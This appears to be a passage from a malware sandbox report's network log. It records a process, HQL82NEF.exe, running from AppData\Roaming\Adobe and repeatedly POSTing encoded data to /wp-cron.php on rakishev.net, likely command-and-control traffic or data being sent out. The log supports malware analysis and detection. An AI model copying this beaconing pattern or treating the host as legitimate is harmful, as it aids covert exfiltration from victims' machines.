2023-10-03 20:39:02 UTC	4409	OUT	Data Raw: 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 2f 59 Data Ascii: PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP/Y
2023-10-03 20:39:02 UTC	4425	OUT	Data Raw: 5a Data Ascii: Z
2023-10-03 20:39:02 UTC	4425	OUT	Data Raw: 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d 6e 71 Data Ascii: SCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBomnq
2023-10-03 20:39:02 UTC	4441	OUT	Data Raw: 34 Data Ascii: 4
2023-10-03 20:39:02 UTC	4441	OUT	Data Raw: 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 76 4f Data Ascii: MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4vO
2023-10-03 20:39:02 UTC	4457	OUT	Data Raw: 61 Data Ascii: a
2023-10-03 20:39:02 UTC	4457	OUT	Data Raw: 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 44 71 Data Ascii: cyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fihDq
2023-10-03 20:39:02 UTC	4473	OUT	Data Raw: 45 Data Ascii: E
2023-10-03 20:39:02 UTC	4473	OUT	Data Raw: 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 66 37 Data Ascii: z9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8vf7
2023-10-03 20:39:03 UTC	4488	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:39:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=p1APvMws%2Bc%2BC0WsNkAE1oStJ21yZSEriAsOh56aO1rxbCUCoaUqizy60TBRpbY0ZculQn%2BTmyCx2ewXx8H%2FZU430cqB5cibBVQK%2FRLujDEgadqjhlrJB%2B2PmOCMI%2BSg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107fdff788d0833-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49801	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:35:18 UTC	2782	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 558 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:35:18 UTC	2782	IN	HTTP/1.1 100 Continue
2023-10-03 20:35:18 UTC	2782	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:35:18 UTC	2782	OUT	Data Raw: 3d 47 76 59 71 38 73 49 78 6c 71 6e 65 47 6b 77 75 42 53 51 44 45 63 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 4f 74 30 50 71 45 72 78 4b 58 6b 42 57 4f 57 6b 59 31 66 65 45 64 69 30 66 77 6e 4a 56 57 61 43 35 5a 58 78 61 4c 31 75 63 74 63 69 53 49 45 71 6c 43 67 58 49 68 25 32 42 79 59 37 52 74 4f 7a 69 77 78 4b 44 34 39 76 71 54 33 46 75 61 66 56 2f 62 58 64 58 25 32 42 59 51 6b 59 76 52 36 47 69 53 41 76 68 57 50 58 49 74 39 54 42 44 55 72 2f 65 66 67 31 36 4e 5a 70 6f 35 6a 66 47 68 70 4d 5a 70 62 6a 50 63 4d 73 49 4f 7a 63 32 56 33 56 44 50 42 2f 66 42 52 6a 76 39 66 46 59 39 43 44 33 69 4e 54 6a 63 Data Ascii: =GvYq8sIxlqneGkwuBSQDEcNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJROt0PqErxKXkBWOWkY1feEdi0fwnJVWaC5ZXxaL1uctciSIEqlCgXIh%2ByY7RtOziwxKD49vqT3FuafV/bXdX%2BYQkYvR6GiSAvhWPXIt9TBDUr/efg16NZpo5jfGhpMZpbjPcMsIOzc2V3VDPB/fBRjv9fFY9CD3iNTjc
2023-10-03 20:35:18 UTC	2782	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:35:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TmrNRmraew7Ja6OWHdjWcWd9p5Sx0IlT%2Fx5KuHwkX5jjFgr%2FK6mIrUMOqdudBZrYGk66EQLA64xbrDZc56FUMGpPruAs3nYdt%2Bbso%2B62CKClKy20EboBj9eJh%2B8H6yM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107f8878c7d81a5-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49824	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:16 UTC	2783	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 868 Expect: 100-continue
2023-10-03 20:36:16 UTC	2784	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:16 UTC	2784	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:16 UTC	2784	OUT	Data Raw: 3d 70 75 61 47 63 47 50 6f 33 56 52 45 51 49 52 36 67 54 49 32 2f 46 78 59 33 46 33 4a 4b 57 42 25 32 42 2f 4c 69 67 6f 6e 4f 76 67 38 5a 42 71 4c 72 61 73 59 71 36 77 6f 78 63 33 6a 55 38 6c 72 48 76 54 4a 35 42 33 34 57 25 32 42 7a 78 4b 6e 64 44 43 66 6c 61 73 54 51 6c 4a 38 61 44 37 37 6f 64 30 56 51 52 6f 42 69 33 55 7a 66 55 69 58 54 6c 7a 6d 66 55 34 43 48 38 37 54 36 25 32 42 6c 47 34 64 39 4f 53 54 4f 69 39 41 4e 4b 6d 7a 69 7a 73 39 4a 34 75 4f 70 38 75 25 32 42 7a 33 48 76 52 4f 50 72 35 57 33 57 4e 52 41 43 39 46 46 64 4f 77 38 62 74 49 4a 62 4d 79 30 6c 61 79 25 32 42 5a 61 36 38 42 48 75 25 32 42 6f 77 37 30 36 74 6c 52 39 54 25 32 42 79 73 73 25 32 42 58 52 65 69 30 32 38 69 25 32 42 31 67 57 5a 43 77 46 25 32 42 25 32 42 6d 6f 38 45 58 4f Data Ascii: =puaGcGPo3VREQIR6gTI2/FxY3F3JKWB%2B/LigonOvg8ZBqLrasYq6woxc3jU8lrHvTJ5B34W%2BzxKndDCflasTQlJ8aD77od0VQRoBi3UzfUiXTlzmfU4CH87T6%2BlG4d9OSTOi9ANKmzizs9J4uOp8u%2Bz3HvROPr5W3WNRAC9FFdOw8btIJbMy0lay%2BZa68BHu%2Bow706tlR9T%2Byss%2BXRei028i%2B1gWZCwF%2B%2Bmo8EXO
2023-10-03 20:36:17 UTC	2895	IN	HTTP/1.1 200 OK Date: Tue, 03 Oct 2023 20:36:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.6.40 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0NhYeI4kisQviHJWGxG%2BLGqDDEaBk4MxlMgmvsOEHQ%2Bex7Lp33XHyQtxdZwo2sVKaO42azO5Tt7LFcUSGVH7WsMLej2iG6YuNbQYH0sz1TnbAXmOxStqc38VgsCdO%2Fc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8107f9f53d872d10-IAD alt-svc: h3=":443"; ma=86400 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49825	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:16 UTC	2783	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 280 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:16 UTC	2785	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:16 UTC	2785	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:16 UTC	2785	OUT	Data Raw: 3d 6b 45 42 35 7a 77 54 78 44 74 45 41 6f 59 7a 46 54 62 6f 55 4d 73 4e 4d 32 73 69 43 75 70 43 65 2f 6d 78 70 52 72 4a 4c 72 4f 68 25 32 42 36 31 31 64 42 69 65 6b 72 4a 74 34 38 51 4e 56 6a 4c 77 76 34 53 33 34 59 5a 39 79 62 54 31 4d 6a 6a 45 32 36 70 52 4a 52 45 69 7a 62 49 39 79 6a 30 44 47 55 45 5a 6e 61 61 67 47 73 52 79 72 70 58 67 59 6c 67 44 4c 42 4d 6c 71 76 45 67 4b 25 32 42 47 75 55 6a 53 45 75 30 73 73 66 4f 62 54 47 61 68 6f 46 59 6d 5a 52 37 44 66 4a 71 75 4d 4c 6f 49 47 58 74 4c 39 73 56 67 41 6f 64 42 38 65 58 74 43 39 7a 2f 44 44 66 5a 79 4a 47 72 46 30 44 46 70 4f 36 75 54 78 2f 45 52 45 34 69 37 64 25 32 42 62 4d 30 49 5a 73 34 41 44 6b 44 70 33 59 6d 59 44 35 37 38 25 32 42 56 49 35 47 25 32 42 39 47 58 78 63 4b 63 52 72 38 7a 65 6d Data Ascii: =kEB5zwTxDtEAoYzFTboUMsNM2siCupCe/mxpRrJLrOh%2B611dBiekrJt48QNVjLwv4S34YZ9ybT1MjjE26pRJREizbI9yj0DGUEZnaagGsRyrpXgYlgDLBMlqvEgK%2BGuUjSEu0ssfObTGahoFYmZR7DfJquMLoIGXtL9sVgAodB8eXtC9z/DDfZyJGrF0DFpO6uTx/ERE4i7d%2BbM0IZs4ADkDp3YmYD578%2BVI5G%2B9GXxcKcRr8zem

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49826	172.67.150.79	443	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe

Timestamp	kBytes transferred	Direction	Data
2023-10-03 20:36:16 UTC	2784	OUT	POST /wp-cron.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: rakishev.net Content-Length: 112854 Expect: 100-continue Connection: Keep-Alive
2023-10-03 20:36:16 UTC	2785	IN	HTTP/1.1 100 Continue
2023-10-03 20:36:16 UTC	2785	OUT	Data Raw: 70 Data Ascii: p
2023-10-03 20:36:16 UTC	2785	OUT	Data Raw: 3d 6d 77 6a 4f 70 4f 61 59 65 36 34 70 42 63 51 30 61 54 65 33 4d 4d 52 39 51 47 75 4e 6b 34 32 4e 55 4d 48 79 62 71 7a 58 75 78 67 6a 44 38 4d 65 61 71 4c 6e 49 56 54 6c 68 34 37 49 6f 71 4a 54 59 78 48 46 7a 66 2f 5a 51 74 70 70 78 37 4d 42 47 71 70 2f 25 32 42 79 71 35 4b 71 55 49 6f 66 47 55 64 25 32 42 62 41 4f 50 4d 61 33 48 50 6b 4a 71 36 50 50 43 6a 6f 50 6f 49 4d 72 39 62 78 66 43 58 68 76 45 49 48 32 6f 48 34 52 57 41 6a 32 37 4a 57 45 7a 42 58 46 78 58 36 36 71 31 4a 69 4e 41 54 48 33 79 31 39 47 6e 44 30 30 43 77 45 44 73 37 4b 32 61 47 77 57 41 68 6f 73 62 51 54 43 61 77 56 6b 2f 56 6c 41 58 78 4a 4d 4b 33 64 53 4f 78 35 76 59 59 79 46 4f 7a 7a 75 79 78 66 39 77 57 55 4d 43 52 35 4c 69 34 38 6a 25 32 42 69 68 79 5a 59 6c 66 46 73 48 65 65 79 Data Ascii: =mwjOpOaYe64pBcQ0aTe3MMR9QGuNk42NUMHybqzXuxgjD8MeaqLnIVTlh47IoqJTYxHFzf/ZQtppx7MBGqp/%2Byq5KqUIofGUd%2BbAOPMa3HPkJq6PPCjoPoIMr9bxfCXhvEIH2oH4RWAj27JWEzBXFxX66q1JiNATH3y19GnD00CwEDs7K2aGwWAhosbQTCawVk/VlAXxJMK3dSOx5vYYyFOzzuyxf9wWUMCR5Li48j%2BihyZYlfFsHeey
2023-10-03 20:36:16 UTC	2801	OUT	Data Raw: 6d Data Ascii: m
2023-10-03 20:36:16 UTC	2801	OUT	Data Raw: 64 34 77 77 54 62 34 6e 47 79 43 35 73 75 71 61 57 6e 4c 49 67 74 6d 72 65 54 44 56 25 32 42 67 68 47 2f 31 63 57 55 51 66 75 36 62 56 6a 56 45 47 45 42 4a 6d 63 52 69 6d 43 33 35 6d 44 6f 47 77 4f 39 51 64 46 47 65 52 30 70 64 4d 56 5a 4e 25 32 42 73 4d 52 46 4f 75 57 41 44 39 2f 79 4a 57 48 62 36 71 35 4d 32 36 75 33 31 45 56 4a 35 35 6b 69 46 6d 50 63 76 6d 4d 59 51 4d 57 69 46 59 25 32 42 68 67 25 32 42 4d 6a 73 55 32 79 62 78 6e 48 79 37 74 78 48 78 4b 41 71 64 73 50 6e 48 63 67 2f 2f 4a 41 69 53 77 33 32 63 63 41 72 4d 70 61 68 68 57 74 59 31 50 77 52 50 64 4f 71 70 62 4d 71 74 74 4e 59 4d 55 6a 77 6a 34 4e 30 30 52 31 39 76 47 6d 67 5a 53 47 4d 63 4c 2f 64 44 6c 6a 79 68 75 6f 48 44 70 42 78 68 6c 45 6d 37 48 35 34 58 67 73 7a 51 42 66 47 35 70 50 Data Ascii: d4wwTb4nGyC5suqaWnLIgtmreTDV%2BghG/1cWUQfu6bVjVEGEBJmcRimC35mDoGwO9QdFGeR0pdMVZN%2BsMRFOuWAD9/yJWHb6q5M26u31EVJ55kiFmPcvmMYQMWiFY%2Bhg%2BMjsU2ybxnHy7txHxKAqdsPnHcg//JAiSw32ccArMpahhWtY1PwRPdOqpbMqttNYMUjwj4N00R19vGmgZSGMcL/dDljyhuoHDpBxhlEm7H54XgszQBfG5pP
2023-10-03 20:36:16 UTC	2817	OUT	Data Raw: 69 Data Ascii: i
2023-10-03 20:36:16 UTC	2817	OUT	Data Raw: 6a 37 50 47 58 2f 39 77 63 68 4f 2f 67 77 79 78 66 77 64 45 54 71 31 68 35 4f 6a 6c 76 4a 77 4e 2f 35 67 6d 48 64 63 30 79 2f 79 4a 42 25 32 42 55 2f 51 44 73 71 79 5a 44 4e 52 74 58 32 66 73 66 25 32 42 6e 32 47 6d 65 34 4d 45 56 78 43 7a 6f 67 75 6b 36 74 6c 4e 66 4b 37 4c 73 4c 6e 57 78 32 62 7a 70 34 37 6b 66 54 73 6d 56 76 6e 79 73 37 56 2f 53 6f 71 39 30 55 6a 53 45 4d 43 48 52 4c 73 58 4b 64 45 37 6c 65 77 39 33 4c 50 42 41 39 69 51 72 4a 56 64 34 63 6b 58 79 4a 4e 64 49 4f 51 76 68 31 77 33 33 46 4e 6d 33 49 58 47 6c 78 73 68 6c 78 32 67 43 62 6f 53 73 6c 49 48 4f 62 67 36 54 72 32 67 38 63 33 31 77 4a 54 38 6b 4a 6f 6a 62 55 72 55 30 68 68 43 42 61 43 6a 58 59 37 55 49 4f 61 64 67 74 74 63 6d 66 32 6a 50 36 73 35 2f 68 77 42 62 32 74 58 4d 47 50 Data Ascii: j7PGX/9wchO/gwyxfwdETq1h5OjlvJwN/5gmHdc0y/yJB%2BU/QDsqyZDNRtX2fsf%2Bn2Gme4MEVxCzoguk6tlNfK7LsLnWx2bzp47kfTsmVvnys7V/Soq90UjSEMCHRLsXKdE7lew93LPBA9iQrJVd4ckXyJNdIOQvh1w33FNm3IXGlxshlx2gCboSslIHObg6Tr2g8c31wJT8kJojbUrU0hhCBaCjXY7UIOadgttcmf2jP6s5/hwBb2tXMGP
2023-10-03 20:36:16 UTC	2833	OUT	Data Raw: 35 Data Ascii: 5
2023-10-03 20:36:16 UTC	2833	OUT	Data Raw: 6b 5a 53 43 70 7a 52 78 73 38 56 4c 65 4f 4a 64 76 75 42 4c 44 67 79 2f 62 65 65 77 6a 56 4f 4d 6f 63 4c 66 75 7a 78 78 48 2f 32 52 64 59 41 4f 73 67 41 35 25 32 42 4c 6e 35 33 76 33 68 66 47 57 44 73 68 4b 70 79 56 50 38 72 46 52 4c 6c 58 73 79 64 33 65 61 73 36 66 6e 33 6f 49 4f 46 6a 47 25 32 42 6d 63 61 68 4f 41 78 4e 5a 72 53 6e 38 69 61 4b 4d 55 25 32 42 2f 57 77 68 32 7a 79 78 66 56 72 4f 37 70 56 69 63 37 44 67 49 68 42 53 67 4d 64 44 75 68 76 51 35 4d 4f 69 75 4b 4b 58 47 57 78 57 4a 4a 56 50 32 53 73 50 39 4a 55 55 59 43 6d 75 4f 41 61 66 61 6e 36 35 57 48 6b 4b 31 75 35 43 4e 4e 7a 42 31 64 39 2f 45 32 31 6c 6e 59 38 42 55 65 4b 69 4d 49 6c 57 30 47 35 6f 51 4a 56 44 75 34 46 77 6f 56 76 43 46 37 33 34 64 44 31 49 76 30 55 79 72 45 6d 42 6f 6d Data Ascii: kZSCpzRxs8VLeOJdvuBLDgy/beewjVOMocLfuzxxH/2RdYAOsgA5%2BLn53v3hfGWDshKpyVP8rFRLlXsyd3eas6fn3oIOFjG%2BmcahOAxNZrSn8iaKMU%2B/Wwh2zyxfVrO7pVic7DgIhBSgMdDuhvQ5MOiuKKXGWxWJJVP2SsP9JUUYCmuOAafan65WHkK1u5CNNzB1d9/E21lnY8BUeKiMIlW0G5oQJVDu4FwoVvCF734dD1Iv0UyrEmBom
2023-10-03 20:36:16 UTC	2849	OUT	Data Raw: 72 Data Ascii: r
2023-10-03 20:36:16 UTC	2849	OUT	Data Raw: 61 34 4d 79 62 46 59 48 6d 72 49 37 42 6c 37 31 45 46 6f 6b 54 31 6c 47 54 66 78 4f 69 36 67 7a 77 65 64 56 41 51 63 54 54 62 35 51 49 71 70 38 44 76 74 58 30 69 63 62 2f 72 34 55 52 30 6c 44 39 59 69 59 25 32 42 57 48 37 55 35 37 53 6e 45 52 43 42 48 4e 47 32 39 38 4d 66 70 64 25 32 42 67 64 59 71 54 78 5a 6f 79 31 32 55 2f 6f 68 53 6f 74 35 6b 41 6c 35 68 39 64 4d 77 64 34 35 42 36 74 48 39 42 53 76 36 7a 52 37 72 37 63 59 44 70 67 4c 53 4c 45 73 2f 4c 25 32 42 72 36 37 71 65 49 7a 34 44 6f 4f 4e 6b 77 31 43 46 2f 47 72 6e 78 41 32 63 6f 47 66 59 32 41 4c 47 42 51 66 4c 4b 58 52 39 49 54 50 64 6c 71 53 61 74 41 78 53 6d 33 55 56 56 47 61 6e 34 34 48 6a 50 74 64 59 73 6a 70 46 63 4f 4f 41 51 4f 30 25 32 42 64 76 44 33 41 61 62 48 54 67 5a 51 4d 4c 4b 34 Data Ascii: a4MybFYHmrI7Bl71EFokT1lGTfxOi6gzwedVAQcTTb5QIqp8DvtX0icb/r4UR0lD9YiY%2BWH7U57SnERCBHNG298Mfpd%2BgdYqTxZoy12U/ohSot5kAl5h9dMwd45B6tH9BSv6zR7r7cYDpgLSLEs/L%2Br67qeIz4DoONkw1CF/GrnxA2coGfY2ALGBQfLKXR9ITPdlqSatAxSm3UVVGan44HjPtdYsjpFcOOAQO0%2BdvD3AabHTgZQMLK4
2023-10-03 20:36:16 UTC	2865	OUT	Data Raw: 77 Data Ascii: w
2023-10-03 20:36:16 UTC	2865	OUT	Data Raw: 53 61 63 79 4e 32 75 32 35 64 57 5a 66 53 55 73 30 54 64 59 73 47 7a 49 45 6d 36 63 4c 39 4d 54 36 6a 4d 4a 4b 78 35 49 71 35 30 77 7a 47 63 77 77 50 34 78 76 41 30 2f 64 46 57 45 55 61 64 53 38 75 65 6f 67 32 4d 6e 61 50 48 6b 52 65 73 58 71 48 57 69 25 32 42 73 4f 4f 46 41 67 66 46 6f 41 78 2f 38 5a 37 4c 4f 34 75 51 55 4d 55 4c 2f 47 4f 74 66 54 7a 5a 78 68 52 2f 56 72 36 42 46 78 63 78 41 30 46 67 35 4c 72 70 51 65 55 69 55 59 33 79 42 31 4e 73 72 25 32 42 72 6b 58 61 48 73 59 65 4e 64 5a 6b 6c 62 6d 4e 79 73 6f 31 52 4d 4c 54 33 4a 61 54 25 32 42 46 70 37 69 77 49 33 78 56 54 67 51 6d 78 37 4c 46 58 48 31 64 59 41 2f 69 35 43 72 4a 43 65 4d 76 79 79 75 2f 34 61 69 63 76 6b 70 76 66 50 48 73 42 4d 55 32 75 41 61 48 79 77 66 65 34 4b 63 54 35 66 69 68 Data Ascii: SacyN2u25dWZfSUs0TdYsGzIEm6cL9MT6jMJKx5Iq50wzGcwwP4xvA0/dFWEUadS8ueog2MnaPHkResXqHWi%2BsOOFAgfFoAx/8Z7LO4uQUMUL/GOtfTzZxhR/Vr6BFxcxA0Fg5LrpQeUiUY3yB1Nsr%2BrkXaHsYeNdZklbmNyso1RMLT3JaT%2BFp7iwI3xVTgQmx7LFXH1dYA/i5CrJCeMvyyu/4aicvkpvfPHsBMU2uAaHywfe4KcT5fih
2023-10-03 20:36:16 UTC	2881	OUT	Data Raw: 56 Data Ascii: V
